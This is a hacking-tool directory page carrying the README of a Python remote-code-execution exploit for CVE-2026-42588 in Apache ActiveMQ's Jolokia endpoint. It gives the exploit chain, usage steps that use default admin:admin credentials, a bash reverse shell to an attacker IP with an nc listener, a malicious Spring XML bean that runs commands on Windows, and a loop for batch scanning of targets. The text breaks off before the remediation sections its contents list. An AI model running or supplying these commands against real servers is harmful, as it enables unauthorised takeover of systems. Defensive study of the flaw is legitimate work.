Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-42588 — Python-based RCE exploit for CVE-2026-42588 targeting Apache ActiveMQ Jolokia. Features check-only mode, malicious XML generation, and support for reverse shell, OOB, and file-based verification. | Kitploit
Tools/GitHubGitHub/hnytgl/cve-2026-42588
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubhnytgl/cve-2026-42588

CVE-2026-42588

Python-based RCE exploit for CVE-2026-42588 targeting Apache ActiveMQ Jolokia. Features check-only mode, malicious XML generation, and support for reverse shell, OOB, and file-based verification.

View Repository
373 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-42588 - Apache ActiveMQ Jolokia Remote Code Execution Exploit

Severity: 🔴 High (CVSS 4.0: 8.1)
Vulnerability Type: CWE-94 — Code Injection
Affected Versions: Apache ActiveMQ < 5.19.7 / 6.0.0 ≤ version < 6.2.6
Prerequisites: Requires Web Console authentication credentials (default admin:admin)


📋 Table of Contents

  • Vulnerability Overview
  • Vulnerability Principle
  • Affected Versions
  • Exploitation Requirements
  • File Description
  • Quick Start
  • Detailed Usage
  • Exploitation Chain Diagram
  • Verifying Successful Exploitation
  • Remediation
  • Temporary Mitigation
  • FAQ
  • Disclaimer
  • References

Vulnerability Overview

CVE-2026-42588 is a post-authentication Remote Code Execution (RCE) vulnerability in Apache ActiveMQ.

An attacker with valid Web Console credentials can invoke the BrokerService.addNetworkConnector(String) method via the Jolokia JMX-HTTP bridge (/api/jolokia/), passing a crafted masterslave:// discovery URI. By leveraging the xbean: protocol to load a remote Spring XML configuration file, arbitrary system commands can be executed in the ActiveMQ Broker's JVM.


Vulnerability Principle

Exploitation Chain

/api/jolokia/ (Jolokia JMX-HTTP Bridge)
       │
       ▼
BrokerService.addNetworkConnector(String)
       │
       ▼
masterslave://?brokerConfig=xbean:http://attacker/malicious.xml
       │
       ▼
XBeanBrokerFactory → ResourceXmlApplicationContext
       │
       ▼
Spring pre-instantiates all singleton Beans → Triggers Runtime.exec() / ProcessBuilder
       │
       ▼
🚨 Remote Code Execution (RCE)

Key Technical Points

ComponentDescription
Jolokia exposureActiveMQ Web Console exposes /api/jolokia/ by default, allowing exec operations on org.apache.activemq:* MBeans
Dangerous methodBrokerService.addNetworkConnector(String) accepts and parses a discovery URI
URI trigger chainThe brokerConfig parameter of the masterslave:// protocol is controllable, combined with the xbean: scheme to trigger Spring context loading
RCE trigger pointXBeanBrokerFactory uses ResourceXmlApplicationContext to load remote XML; Spring instantiates all singleton Beans before configuration is validated

Affected Versions

Version RangeStatus
Apache ActiveMQ < 5.19.7❌ Vulnerable
6.0.0 ≤ Apache ActiveMQ < 6.2.6❌ Vulnerable
Apache ActiveMQ ≥ 5.19.7✅ Fixed
Apache ActiveMQ ≥ 6.2.6✅ Fixed

Exploitation Requirements

  1. ✅ Network reachability — The /api/jolokia/ endpoint must be accessible to the attacker (default port 8161)
  2. ✅ Valid credentials — Authentication credentials for the ActiveMQ Web Console are required (default admin:admin)
  3. ✅ Attacker HTTP server — An HTTP server accessible by the target is required to host the malicious XML file

File Description

.
├── CVE-2026-42588_EXP.py   # Exploit script (core)
├── malicious.xml            # Malicious Spring XML template
├── requirements.txt         # Python dependencies
└── README.md                # This file
FilePurpose
CVE-2026-42588_EXP.pyPython exploit script; supports detection mode (--check-only) and XML generation mode (--gen-xml)
malicious.xmlMalicious Spring XML configuration template; contains both Runtime.exec() and ProcessBuilder exploitation methods

Quick Start

1. Install Dependencies

pip install -r requirements.txt

2. Generate Malicious XML File

python CVE-2026-42588_EXP.py --gen-xml -c "touch /tmp/activemq_pwned" > malicious.xml

3. Host the Malicious XML File

Start an HTTP server on the attacker machine:

python3 -m http.server 8080

4. Execute the Exploit

# Use default credentials admin/admin
python CVE-2026-42588_EXP.py \
    -u http://192.168.1.100:8161 \
    -x http://your-attacker-ip:8080/malicious.xml

# Use custom credentials
python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -U myuser \
    -P mypass \
    -x http://your-attacker-ip:8080/malicious.xml

5. (Optional) Check Vulnerability Only

python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only

Detailed Usage

Command Line Arguments

usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
                             [-x XML_URL] [--check-only] [--gen-xml]
                             [-c COMMAND] [--timeout TIMEOUT] [--no-verify]

Options:
  -u, --url         Target ActiveMQ URL (e.g., http://192.168.1.100:8161)
  -U, --username    Web Console username (default: admin)
  -P, --password    Web Console password (default: admin)
  -x, --xml-url     Remote URL of the malicious Spring XML file
  --check-only      Only check if the Jolokia endpoint is accessible
  --gen-xml         Generate a malicious XML file and output to stdout
  -c, --command     Command to execute on the target (default: touch /tmp/activemq_pwned)
  --timeout         HTTP request timeout in seconds (default: 30)
  --no-verify       Disable SSL certificate verification

Scenario 1: Reverse Shell

1. Generate malicious XML on the attacker machine:

python CVE-2026-42588_EXP.py --gen-xml \
    -c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
    > reverse_shell.xml

2. Host XML and start listener:

# Terminal 1: HTTP server
python3 -m http.server 8080

# Terminal 2: nc listener
nc -lvnp 4444

3. Trigger the vulnerability:

python CVE-2026-42588_EXP.py \
    -u http://target:8161 \
    -x http://10.0.0.1:8080/reverse_shell.xml

Scenario 2: CMD Command Execution (Windows Target)

1. Generate malicious XML for Windows:

Modify the ProcessBuilder command in malicious.xml to:

<bean class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
        <list>
            <value>cmd.exe</value>
            <value>/c</value>
            <value>whoami &gt; C:\windows\temp\pwned.txt</value>
        </list>
    </constructor-arg>
</bean>

2. Host and execute:

python CVE-2026-42588_EXP.py \
    -u http://windows-target:8161 \
    -x http://attacker:8080/malicious_win.xml

Scenario 3: Vulnerability Detection Only

# Batch detection
for ip in $(cat targets.txt); do
    echo "=== Testing $ip ==="
    python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
done

Exploitation Chain Diagram

Download Tool